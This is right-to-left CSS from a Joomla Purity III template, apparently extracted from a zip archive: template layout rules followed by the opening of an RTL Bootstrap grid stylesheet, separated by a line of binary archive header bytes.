.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
  background-color: #f5f5f5;
}
.row-striped .row-fluid {
  width: 97%;
}
.row-striped .row-fluid [class*="span"] {
  min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
  margin-right: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
  margin-right: 0;
}
.list-condensed li {
  padding: 5px 10px;
}
.row-condensed .row,
.row-condensed .row-fluid {
  padding: 5px 10px;
}
.list-bordered,
.row-bordered {
  list-style: none;
  line-height: 18px;
  text-align: right;
  vertical-align: middle;
  margin-right: 0;
  border: 1px solid #dddddd;
}
.login-wrap .other-links ul {
  padding-right: 15px;
}
.form-register fieldset {
  padding: 0 0 10px;
}
.form-register p {
  margin: 0 0 5px;
}
.form-register p.form-des {
  margin: 15px 0;
}
.form-register label {
  display: block;
  float: right;
  font-weight: bold;
  text-align: left;
  width: 130px;
}
.form-register .input,
.form-register .inputbox {
  margin-right: 10px;
  width: 200px;
}
.form-register .btn,
.form-register .button {
  margin-right: 140px;
}
.registration fieldset dt {
  margin-left: 5px;
}
.admintable textarea {
  max-width: 90% !important;
  resize: none;
}
.com_mailto body {
  padding: 10px;
}
.com_mailto .t3-mainbody {
  padding-top: 0;
  padding-bottom: 0;
}
.com_mailto .t3-content {
  width: auto;
}
#mailto-window {
  background: #fff;
  margin: 10px 0 20px;
  padding: 0;
  position: relative;
}
#mailto-window h2 {
  margin-top: 0;
  margin-bottom: 20px;
}
#mailtoForm .formelm {
  padding: 5px 0;
  vertical-align: middle;
  overflow: hidden;
}
#mailtoForm .formelm label {
  display: inline-block;
  float: right;
  font-weight: bold;
  vertical-align: middle;
  width: 100px;
}
#mailtoForm p {
  margin-top: 20px;
}
#mailtoForm .input,
#mailtoForm .inputbox {
  width: 65%;
}
#mailtoForm .btn,
#mailtoForm .button,
#mailtoForm button {
  margin-left: 5px;
}
.user-details {
  padding: 10px 0;
}
.user-details p {
  margin: 0 0 5px;
}
.user-details label {
  display: block;
  float: right;
  font-weight: bold;
  text-align: left;
  width: 130px;
}
.user-details .input,
.user-details .inputbox {
  margin-right: 10px;
  width: 200px;
}
.user-details .btn,
.user-details button {
  margin-right: 140px;
}
.user-details .paramlist .paramlist_key {
  padding: 0 0 5px;
  width: 130px;
}
.user-details .paramlist .paramlist_value {
  padding: 0 0 5px;
}
.user-details .user_name span {
  font-weight: bold;
  padding-right: 10px;
}
.reset .form-validate p,
.remind .form-validate p {
  background: #878787;
  border: 1px solid #2d2d2d;
  margin-bottom: 20px;
  padding: 10px 20px;
  border-radius: 4px;
}
.reset .form-validate fieldset dl,
.remind .form-validate fieldset dl {
  margin: 0;
}
.reset .form-validate fieldset dt,
.remind .form-validate fieldset dt {
  margin: 4px 0 0 0;
}
.profile-edit input {
  position: relative;
  min-height: 1px;
  padding-right: 6px;
  padding-left: 6px;
}
@media (min-width: 768px) {
  .profile-edit input {
    float: right;
    width: 50%;
  }
}
.profile-edit select {
  position: relative;
  min-height: 1px;
  padding-right: 6px;
  padding-left: 6px;
}
@media (min-width: 768px) {
  .profile-edit select {
    float: right;
    width: 50%;
  }
}
.profile-edit select + button {
  margin-right: 5px;
}
#searchForm:before,
#searchForm:after {
  content: " ";
  display: table;
}
#searchForm:after {
  clear: both;
}
#searchForm fieldset {
  margin: 20px 0;
}
#searchForm legend {
  margin-bottom: 10px;
}
#searchForm select {
  width: auto;
  display: inline-block;
  margin-right: 5px;
  padding-right: 5px;
}
#searchForm .form-limit {
  margin-top: 20px;
}
#searchForm .form-limit .counter {
  margin-top: 0;
}
@media screen and (max-width: 768px) {
  #searchForm .radio-inline,
  #searchForm .checkbox-inline {
    display: block;
    width: 100%;
    margin-right: 0;
  }
}
.search-results {
  margin-top: 20px;
}
.search-results .result-title {
  font-size: 16px;
  margin-top: 20px;
}
.search-results .result-category {
  font-size: 12px;
  color: #5a5a5a;
}
.search-results .result-text {
  margin-top: 5px;
  margin-bottom: 5px;
}
.search-results .result-created {
  font-size: 12px;
  color: #5a5a5a;
}
div.finder {
  margin-bottom: 20px;
}
.contact .accordion-heading .accordion-toggle {
  font-weight: bold;
}
#archive-items > li {
  line-height: normal;
  margin: 0;
  overflow: visible;
  padding: 0;
}
#archive-items .intro {
  clear: both;
  overflow: hidden;
}
.categories-list {
  margin-bottom: 20px;
}
.category-item:before,
.category-item:after {
  content: " ";
  display: table;
}
.category-item:after {
  clear: both;
}
.category-item .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.category-item .category-item {
  margin-bottom: 0;
  margin-right: 30px;
}
.category-item .category-item .page-header {
  font-size: 14px;
}
.cat-children .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.newsfeed-category > h2,
.newsfeed > h2 {
  border-bottom: 1px solid #2d2d2d;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed-category .category-desc,
.newsfeed .category-desc {
  margin-bottom: 20px;
}
.newsfeed-category .category li:before,
.newsfeed .category li:before,
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  content: " ";
  display: table;
}
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  clear: both;
}
.newsfeed > h2 {
  border-bottom: 1px solid #2d2d2d;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed .feed-description {
  margin-bottom: 20px;
  font-size: 16px;
}
.newsfeed .feed-item-description .feed-description {
  font-size: 14px;
}
.newsfeed ol li > a {
  font-weight: bold;
  font-size: 16px;
}
.article-content .pagination ul {
  border-right: 1px solid #2d2d2d;
}
.article-content .pagination li {
  float: right;
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #2d2d2d;
  border-right: 0;
}
.article-content .pagination li a {
  border: 0;
  text-decoration: none;
  background-color: transparent;
  line-height: normal;
  padding: 0;
}
.pagenavcounter {
  margin: 0 0 20px;
  font-weight: bold;
}
#article-index,
.article-index {
  margin: 0 20px 20px 0;
  padding: 10px;
  width: 25%;
  border: 1px solid #2d2d2d;
  border-radius: 4px;
}
#article-index ul,
.article-index ul {
  margin: 0;
  padding: 0;
  border: 0;
}
#article-index ul > li,
.article-index ul > li {
  border: 0;
  margin-top: 2px;
}
#article-index ul > li > a,
.article-index ul > li > a {
  border: 0;
  padding: 5px;
  border-radius: 4px;
}
#article-index ul > .active > a,
.article-index ul > .active > a {
  border: 0;
  background: #0077bb;
  color: #ffffff;
}
#article-index ul > .active > a:hover,
.article-index ul > .active > a:hover,
#article-index ul > .active > a:active,
.article-index ul > .active > a:active,
#article-index ul > .active > a:focus,
.article-index ul > .active > a:focus {
  border: 0;
  background: #0077bb;
  color: #ffffff;
}
.pagenav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.pagenav > li {
  margin: 0;
  padding: 0;
  float: right;
}
.pagenav > li.pagenav-prev,
.pagenav > li.previous {
  margin-left: 10px;
}
.pagenav li > a {
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #1f1f1f;
  border-radius: 4px;
}
.pagenav li > a:hover,
.pagenav li > a:active,
.pagenav li > a:focus {
  background-color: #4b4b4b;
}
.items-more h3 {
  margin: 0 0 20px;
}
.items-more .nav > li {
  border-top: 1px solid #2d2d2d;
}
.items-more .nav > li > a {
  padding: 6px 5px;
}
.back_button a {
  display: block;
  margin: 10px 0;
}
.filters {
  margin: 10px 0 5px;
}
.display-limit {
  margin: 10px 0 5px;
}
.filters .display-limit {
  float: left;
  text-align: left;
}
#system-message dt {
  font-weight: bold;
}
#system-message dd {
  font-weight: bold;
}
#system-message dd.message ul,
#system-message dd.error ul,
#system-message dd.notice ul {
  margin: 0;
  padding: 0;
}
#system-message dd.message ul li,
#system-message dd.error ul li,
#system-message dd.notice ul li {
  background: none;
  margin: 0;
  padding: 5px;
}
.alert-message {
  background-color: #dff0d8;
  border-color: #d6e9c6;
  color: #468847;
}
.alert-message hr {
  border-top-color: #c9e2b3;
}
.alert-message .alert-link {
  color: #356635;
}
.alert-notice {
  background-color: #d9edf7;
  border-color: #bce8f1;
  color: #3a87ad;
}
.alert-notice hr {
  border-top-color: #a6e1ec;
}
.alert-notice .alert-link {
  color: #2d6987;
}
.alert-error {
  background-color: #f2dede;
  border-color: #ebccd1;
  color: #b94a48;
}
.alert-error hr {
  border-top-color: #e4b9c0;
}
.alert-error .alert-link {
  color: #953b39;
}
.tip-wrap {
  background: #fff6df;
  border: 1px solid #fb3;
  border-radius: 5px;
  -webkit-box-shadow: none;
  box-shadow: none;
  max-width: 300px;
  z-index: 999;
}
.tip-title {
  border-bottom: 1px solid #fb3;
  font-weight: bold;
  padding: 5px 10px;
}
.tip-text {
  font-size: 14px;
  margin: 0;
  padding: 5px 10px;
}
.hasTip img {
  border: none;
  margin: 0 0 0 5px;
}
@media (min-width: 768px) {
  .languageswitcherload {
    float: left;
    width: 100%;
  }
  .languageswitcherload .mod-languages {
    text-align: left;
  }
}
div.calendar {
  width: 187px;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
.chzn-container {
  display: block;
}
.chzn-container-single .chzn-single,
.chzn-container-multi .chzn-choices .search-field input,
.chzn-container-single .chzn-search input {
  height: 26px;
}
.chzn-container-single .chzn-drop,
.chzn-container .chzn-drop {
  -webkit-box-sizing: content-box !important;
  -moz-box-sizing: content-box !important;
  box-sizing: content-box !important;
}
.input-prepend .chzn-container-single .chzn-single {
  border-color: #1f1f1f;
  height: 26px;
  border-radius: 3px 0 0 3px;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.input-prepend .chzn-container-active .chzn-single-with-drop {
  border-radius: 3px 0 0 0;
}
.input-prepend .chzn-container-single .chzn-drop {
  border-color: #1f1f1f;
}
.btn-group .chzn-results {
  white-space: normal;
}

.page-header {
  padding-bottom: 9px;
  margin: 0 0 20px;
  border-bottom: 1px solid #878787;
}
.page-title,
.page-header h1 {
  line-height: 1;
  margin: 0;
}
.page-subheader {
  border-bottom: 1px solid #2d2d2d;
  margin: 0 0 20px;
}
.page-subheader:before,
.page-subheader:after {
  content: " ";
  display: table;
}
.page-subheader:after {
  clear: both;
}
.page-subtitle,
.page-subheader h2 {
  line-height: 1;
  margin: 0;
}
.page-header + .page-subheader {
  margin-top: -20px;
}
.article-title,
.article-header h1 {
  margin: 0 0 20px 0;
}
.item-title {
  font-weight: bold;
}
.jumbotron h1,
.jumbotron h2,
.jumbotron h3 {
  margin-top: 0;
}
.jumbotron p:last-child {
  margin-bottom: 0;
}
.container .jumbotron {
  border-radius: 6px;
}
@media screen and (min-width: 768px) {
  
}
.masthead {
  padding: 40px 0;
  text-align: center;
}
.masthead p:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 768px) {
  .masthead {
    padding: 80px 0;
  }
  .masthead h1 {
    font-size: 98px;
  }
  .masthead p {
    font-size: 28px;
  }
  .masthead .btn-lg {
    margin-top: 20px;
    padding: 18px 42px;
    font-size: 21px;
  }
}
.label:empty {
  display: none;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.page-header .label,
.page-header .badge {
  vertical-align: middle;
}
.alert h4 {
  color: inherit;
}
.media:first-child {
  margin-top: 0;
}
.media-object {
  display: block;
}
.media-heading {
  margin: 0 0 5px;
}
.media > .pull-left {
  margin-left: 10px;
}
.media > .pull-right {
  margin-right: 10px;
}

.t3-header {
  padding-top: 20px;
  padding-bottom: 20px;
}
.logo {
  text-align: center;
}
@media screen and (min-width: 768px) {
  .logo {
    text-align: right;
  }
}
.logo a {
  display: inline-block;
  line-height: 1;
  margin: 0;
}
.logo-image span,
.logo-image small {
  display: none;
}
.logo-text a {
  text-decoration: none;
  font-size: 28px;
  font-weight: bold;
}
.logo-text:hover a,
.logo-text a:hover,
.logo-text a:active,
.logo-text a:focus {
  text-decoration: none;
}
.logo-text .site-slogan {
  display: block;
  font-size: 14px;
  margin-top: 5px;
}
.head-search {
  margin-top: 20px;
}
.head-search:before,
.head-search:after {
  content: " ";
  display: table;
}
.head-search:after {
  clear: both;
}
.head-search form {
  margin: 0;
}
.head-search label {
  display: none;
}
.head-search .search {
  position: relative;
}
.head-search .search:before {
  font-family: "FontAwesome";
  content: "\f002";
  display: block;
  position: absolute;
  right: 10px;
  top: 6px;
  color: #4b4b4b;
}
@media screen and (min-width: 768px) {
  .head-search .search {
    float: left;
  }
}
.head-search .form-control {
  width: 100%;
  padding-right: 30px;
}
@media screen and (min-width: 768px) {
  .head-search .form-control {
    width: 150px;
  }
  .head-search .form-control:focus {
    width: 200px;
  }
}
.t3-sl {
  padding-bottom: 40px;
  padding-top: 40px;
}
@media screen and (min-width: 768px) {
  .t3-sl {
    padding-bottom: 60px;
    padding-top: 60px;
  }
}
.t3-mainbody {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-content {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-sidebar {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-footer {
  border-top: 1px solid #2d2d2d;
  background: #1f1f1f;
  color: #878787;
}
.t3-footer:before,
.t3-footer:after {
  content: " ";
  display: table;
}
.t3-footer:after {
  clear: both;
}
.t3-footer small {
  display: block;
  font-size: 100%;
}
.t3-footnav {
  padding: 20px 0;
}
.t3-footnav:before,
.t3-footnav:after {
  content: " ";
  display: table;
}
.t3-footnav:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .t3-footnav {
    padding: 40px 0;
  }
}
.t3-footnav .t3-module {
  background: #1f1f1f;
  color: #878787;
  margin-top: 10px;
  margin-bottom: 10px;
}
.t3-footnav .t3-module .module-title {
  color: #ffffff;
  font-size: 18px;
  margin-bottom: 10px;
}
.t3-footnav .t3-module ul {
  list-style: none;
  margin-right: 0;
  margin-bottom: 0;
  padding-right: 0;
}
.t3-footnav .t3-module ul > li {
  line-height: 24px;
}
.t3-footnav .t3-module ul > li > a {
  color: #878787;
}
.t3-footnav .t3-module ul > li > a:hover,
.t3-footnav .t3-module ul > li > a:active,
.t3-footnav .t3-module ul > li > a:focus {
  color: #878787;
}
.t3-copyright {
  border-top: 1px solid #2d2d2d;
  font-size: 12px;
  padding: 40px 0 80px;
}
.t3-copyright:before,
.t3-copyright:after {
  content: " ";
  display: table;
}
.t3-copyright:after {
  clear: both;
}
.t3-copyright small {
  margin-bottom: 5px;
}
.copyright {
  margin-bottom: 20px;
}
.poweredby:before,
.poweredby:after {
  content: " ";
  display: table;
}
.poweredby:after {
  clear: both;
}
@media screen and (min-width: 991px) {
  .poweredby {
    text-align: left;
  }
}
.poweredby .t3-logo,
.poweredby .t3-logo-small {
  opacity: .8;
  display: inline-block;
}

.page-header {
  border-bottom: 1px solid #2d2d2d;
}
.img_caption p.img_caption {
  background: #2d2d2d;
  color: #5a5a5a;
}

.off-canvas body > .autocompleter-choices {
  width: 0px;
  left: auto;
}
article img[align=left],
.img_caption.left,
.pull-left.item-image {
  margin: 0 30px 20px 0;
}
article img[align=right],
.img_caption.right,
.pull-right.item-image {
  margin: 0 0 20px 30px;
}
.languageswitcherload ul {
  float: left;
}
PKӜ�\��i�l�l purity_iii/css/rtl/bootstrap.cssnu&1i�html {
  font-family: sans-serif;
  -ms-text-size-adjust: 100%;
  -webkit-text-size-adjust: 100%;
}
body {
  margin: 0;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
menu,
nav,
section,
summary {
  display: block;
}
audio,
canvas,
progress,
video {
  display: inline-block;
  vertical-align: baseline;
}
audio:not([controls]) {
  display: none;
  height: 0;
}
[hidden],
template {
  display: none;
}
a {
  background-color: transparent;
}
a:active,
a:hover {
  outline: 0;
}
abbr[title] {
  border-bottom: none;
  text-decoration: underline;
  text-decoration: underline dotted;
}
b,
strong {
  font-weight: bold;
}
dfn {
  font-style: italic;
}
h1 {
  font-size: 2em;
  margin: 0.67em 0;
}
mark {
  background: #ff0;
  color: #000;
}
small {
  font-size: 80%;
}
sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}
img {
  border: 0;
}
svg:not(:root) {
  overflow: hidden;
}
figure {
  margin: 1em 40px;
}
hr {
  box-sizing: content-box;
  height: 0;
}
pre {
  overflow: auto;
}
code,
kbd,
pre,
samp {
  font-family: monospace, monospace;
  font-size: 1em;
}
button,
input,
optgroup,
select,
textarea {
  color: inherit;
  font: inherit;
  margin: 0;
}
button {
  overflow: visible;
}
button,
select {
  text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
  -webkit-appearance: button;
  cursor: pointer;
}
button[disabled],
html input[disabled] {
  cursor: default;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  border: 0;
  padding: 0;
}
input {
  line-height: normal;
}
input[type="checkbox"],
input[type="radio"] {
  box-sizing: border-box;
  padding: 0;
}
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: textfield;
  box-sizing: content-box;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}
fieldset {
  border: 1px solid #c0c0c0;
  margin: 0 2px;
  padding: 0.35em 0.625em 0.75em;
}
legend {
  border: 0;
  padding: 0;
}
textarea {
  overflow: auto;
}
optgroup {
  font-weight: bold;
}
table {
  border-collapse: collapse;
  border-spacing: 0;
}
td,
th {
  padding: 0;
}

@media print {
  *,
  *:before,
  *:after {
    color: #000 !important;
    text-shadow: none !important;
    background: transparent !important;
    box-shadow: none !important;
  }
  a,
  a:visited {
    text-decoration: underline;
  }
  a[href]:after {
    content: " (" attr(href) ")";
  }
  abbr[title]:after {
    content: " (" attr(title) ")";
  }
  a[href^="#"]:after,
  a[href^="javascript:"]:after {
    content: "";
  }
  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }
  thead {
    display: table-header-group;
  }
  tr,
  img {
    page-break-inside: avoid;
  }
  img {
    max-width: 100% !important;
  }
  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }
  h2,
  h3 {
    page-break-after: avoid;
  }
  .navbar {
    display: none;
  }
  .btn > .caret,
  .dropup > .btn > .caret {
    border-top-color: #000 !important;
  }
  .label {
    border: 1px solid #000;
  }
  .table {
    border-collapse: collapse !important;
  }
  .table td,
  .table th {
    background-color: #fff !important;
  }
  .table-bordered th,
  .table-bordered td {
    border: 1px solid #ddd !important;
  }
}

* {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
*:before,
*:after {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
html {
  font-size: 10px;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  line-height: 1.42857143;
  color: #444444;
  background-color: #ffffff;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #0077bb;
  text-decoration: none;
}
a:hover,
a:focus {
  color: #00466e;
  text-decoration: underline;
}
a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
figure {
  margin: 0;
}
img {
  vertical-align: middle;
}
.img-responsive,
.thumbnail > img,
.thumbnail a > img,
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  display: block;
  max-width: 100%;
  height: auto;
}
.img-rounded {
  border-radius: 0;
}
.img-thumbnail {
  padding: 4px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
  -webkit-transition: all 0.2s ease-in-out;
  -o-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
  display: inline-block;
  max-width: 100%;
  height: auto;
}
.img-circle {
  border-radius: 50%;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  padding: 0;
  margin: -1px;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  border: 0;
}
.sr-only-focusable:active,
.sr-only-focusable:focus {
  position: static;
  width: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  clip: auto;
}
[role="button"] {
  cursor: pointer;
}

code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
code {
  padding: 2px 4px;
  font-size: 90%;
  color: #c7254e;
  background-color: #f9f2f4;
  border-radius: 0;
}
kbd {
  padding: 2px 4px;
  font-size: 90%;
  color: #ffffff;
  background-color: #333333;
  border-radius: 0;
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.25);
}
kbd kbd {
  padding: 0;
  font-size: 100%;
  font-weight: 700;
  box-shadow: none;
}
pre {
  display: block;
  padding: 9.5px;
  margin: 0 0 10px;
  font-size: 13px;
  line-height: 1.42857143;
  color: #444444;
  word-break: break-all;
  word-wrap: break-word;
  background-color: #f5f5f5;
  border: 1px solid #cccccc;
  border-radius: 0;
}
pre code {
  padding: 0;
  font-size: inherit;
  color: inherit;
  white-space: pre-wrap;
  background-color: transparent;
  border-radius: 0;
}
.pre-scrollable {
  max-height: 340px;
  overflow-y: scroll;
}
.container {
  padding-left: 20px;
  padding-right: 20px;
  margin-left: auto;
  margin-right: auto;
}
@media (min-width: 768px) {
  .container {
    width: 760px;
  }
}
@media (min-width: 992px) {
  .container {
    width: 980px;
  }
}
@media (min-width: 1200px) {
  .container {
    width: 1180px;
  }
}
.container-fluid {
  padding-left: 20px;
  padding-right: 20px;
  margin-left: auto;
  margin-right: auto;
}
.row {
  margin-left: -20px;
  margin-right: -20px;
}
.row-no-gutters {
  margin-left: 0;
  margin-right: 0;
}
.row-no-gutters [class*="col-"] {
  padding-left: 0;
  padding-right: 0;
}
.col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 {
  position: relative;
  min-height: 1px;
  padding-left: 20px;
  padding-right: 20px;
}
.col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 {
  float: right;
}
.col-xs-12 {
  width: 100%;
}
.col-xs-11 {
  width: 91.66666667%;
}
.col-xs-10 {
  width: 83.33333333%;
}
.col-xs-9 {
  width: 75%;
}
.col-xs-8 {
  width: 66.66666667%;
}
.col-xs-7 {
  width: 58.33333333%;
}
.col-xs-6 {
  width: 50%;
}
.col-xs-5 {
  width: 41.66666667%;
}
.col-xs-4 {
  width: 33.33333333%;
}
.col-xs-3 {
  width: 25%;
}
.col-xs-2 {
  width: 16.66666667%;
}
.col-xs-1 {
  width: 8.33333333%;
}
.col-xs-pull-12 {
  left: 100%;
}
.col-xs-pull-11 {
  left: 91.66666667%;
}
.col-xs-pull-10 {
  left: 83.33333333%;
}
.col-xs-pull-9 {
  left: 75%;
}
.col-xs-pull-8 {
  left: 66.66666667%;
}
.col-xs-pull-7 {
  left: 58.33333333%;
}
.col-xs-pull-6 {
  left: 50%;
}
.col-xs-pull-5 {
  left: 41.66666667%;
}
.col-xs-pull-4 {
  left: 33.33333333%;
}
.col-xs-pull-3 {
  left: 25%;
}
.col-xs-pull-2 {
  left: 16.66666667%;
}
.col-xs-pull-1 {
  left: 8.33333333%;
}
.col-xs-pull-0 {
  left: auto;
}
.col-xs-push-12 {
  right: 100%;
}
.col-xs-push-11 {
  right: 91.66666667%;
}
.col-xs-push-10 {
  right: 83.33333333%;
}
.col-xs-push-9 {
  right: 75%;
}
.col-xs-push-8 {
  right: 66.66666667%;
}
.col-xs-push-7 {
  right: 58.33333333%;
}
.col-xs-push-6 {
  right: 50%;
}
.col-xs-push-5 {
  right: 41.66666667%;
}
.col-xs-push-4 {
  right: 33.33333333%;
}
.col-xs-push-3 {
  right: 25%;
}
.col-xs-push-2 {
  right: 16.66666667%;
}
.col-xs-push-1 {
  right: 8.33333333%;
}
.col-xs-push-0 {
  right: auto;
}
.col-xs-offset-12 {
  margin-right: 100%;
}
.col-xs-offset-11 {
  margin-right: 91.66666667%;
}
.col-xs-offset-10 {
  margin-right: 83.33333333%;
}
.col-xs-offset-9 {
  margin-right: 75%;
}
.col-xs-offset-8 {
  margin-right: 66.66666667%;
}
.col-xs-offset-7 {
  margin-right: 58.33333333%;
}
.col-xs-offset-6 {
  margin-right: 50%;
}
.col-xs-offset-5 {
  margin-right: 41.66666667%;
}
.col-xs-offset-4 {
  margin-right: 33.33333333%;
}
.col-xs-offset-3 {
  margin-right: 25%;
}
.col-xs-offset-2 {
  margin-right: 16.66666667%;
}
.col-xs-offset-1 {
  margin-right: 8.33333333%;
}
.col-xs-offset-0 {
  margin-right: 0%;
}
@media (min-width: 768px) {
  .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 {
    float: right;
  }
  .col-sm-12 {
    width: 100%;
  }
  .col-sm-11 {
    width: 91.66666667%;
  }
  .col-sm-10 {
    width: 83.33333333%;
  }
  .col-sm-9 {
    width: 75%;
  }
  .col-sm-8 {
    width: 66.66666667%;
  }
  .col-sm-7 {
    width: 58.33333333%;
  }
  .col-sm-6 {
    width: 50%;
  }
  .col-sm-5 {
    width: 41.66666667%;
  }
  .col-sm-4 {
    width: 33.33333333%;
  }
  .col-sm-3 {
    width: 25%;
  }
  .col-sm-2 {
    width: 16.66666667%;
  }
  .col-sm-1 {
    width: 8.33333333%;
  }
  .col-sm-pull-12 {
    left: 100%;
  }
  .col-sm-pull-11 {
    left: 91.66666667%;
  }
  .col-sm-pull-10 {
    left: 83.33333333%;
  }
  .col-sm-pull-9 {
    left: 75%;
  }
  .col-sm-pull-8 {
    left: 66.66666667%;
  }
  .col-sm-pull-7 {
    left: 58.33333333%;
  }
  .col-sm-pull-6 {
    left: 50%;
  }
  .col-sm-pull-5 {
    left: 41.66666667%;
  }
  .col-sm-pull-4 {
    left: 33.33333333%;
  }
  .col-sm-pull-3 {
    left: 25%;
  }
  .col-sm-pull-2 {
    left: 16.66666667%;
  }
  .col-sm-pull-1 {
    left: 8.33333333%;
  }
  .col-sm-pull-0 {
    left: auto;
  }
  .col-sm-push-12 {
    right: 100%;
  }
  .col-sm-push-11 {
    right: 91.66666667%;
  }
  .col-sm-push-10 {
    right: 83.33333333%;
  }
  .col-sm-push-9 {
    right: 75%;
  }
  .col-sm-push-8 {
    right: 66.66666667%;
  }
  .col-sm-push-7 {
    right: 58.33333333%;
  }
  .col-sm-push-6 {
    right: 50%;
  }
  .col-sm-push-5 {
    right: 41.66666667%;
  }
  .col-sm-push-4 {
    right: 33.33333333%;
  }
  .col-sm-push-3 {
    right: 25%;
  }
  .col-sm-push-2 {
    right: 16.66666667%;
  }
  .col-sm-push-1 {
    right: 8.33333333%;
  }
  .col-sm-push-0 {
    right: auto;
  }
  .col-sm-offset-12 {
    margin-right: 100%;
  }
  .col-sm-offset-11 {
    margin-right: 91.66666667%;
  }
  .col-sm-offset-10 {
    margin-right: 83.33333333%;
  }
  .col-sm-offset-9 {
    margin-right: 75%;
  }
  .col-sm-offset-8 {
    margin-right: 66.66666667%;
  }
  .col-sm-offset-7 {
    margin-right: 58.33333333%;
  }
  .col-sm-offset-6 {
    margin-right: 50%;
  }
  .col-sm-offset-5 {
    margin-right: 41.66666667%;
  }
  .col-sm-offset-4 {
    margin-right: 33.33333333%;
  }
  .col-sm-offset-3 {
    margin-right: 25%;
  }
  .col-sm-offset-2 {
    margin-right: 16.66666667%;
  }
  .col-sm-offset-1 {
    margin-right: 8.33333333%;
  }
  .col-sm-offset-0 {
    margin-right: 0%;
  }
}
@media (min-width: 992px) {
  .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 {
    float: right;
  }
  .col-md-12 {
    width: 100%;
  }
  .col-md-11 {
    width: 91.66666667%;
  }
  .col-md-10 {
    width: 83.33333333%;
  }
  .col-md-9 {
    width: 75%;
  }
  .col-md-8 {
    width: 66.66666667%;
  }
  .col-md-7 {
    width: 58.33333333%;
  }
  .col-md-6 {
    width: 50%;
  }
  .col-md-5 {
    width: 41.66666667%;
  }
  .col-md-4 {
    width: 33.33333333%;
  }
  .col-md-3 {
    width: 25%;
  }
  .col-md-2 {
    width: 16.66666667%;
  }
  .col-md-1 {
    width: 8.33333333%;
  }
  .col-md-pull-12 {
    left: 100%;
  }
  .col-md-pull-11 {
    left: 91.66666667%;
  }
  .col-md-pull-10 {
    left: 83.33333333%;
  }
  .col-md-pull-9 {
    left: 75%;
  }
  .col-md-pull-8 {
    left: 66.66666667%;
  }
  .col-md-pull-7 {
    left: 58.33333333%;
  }
  .col-md-pull-6 {
    left: 50%;
  }
  .col-md-pull-5 {
    left: 41.66666667%;
  }
  .col-md-pull-4 {
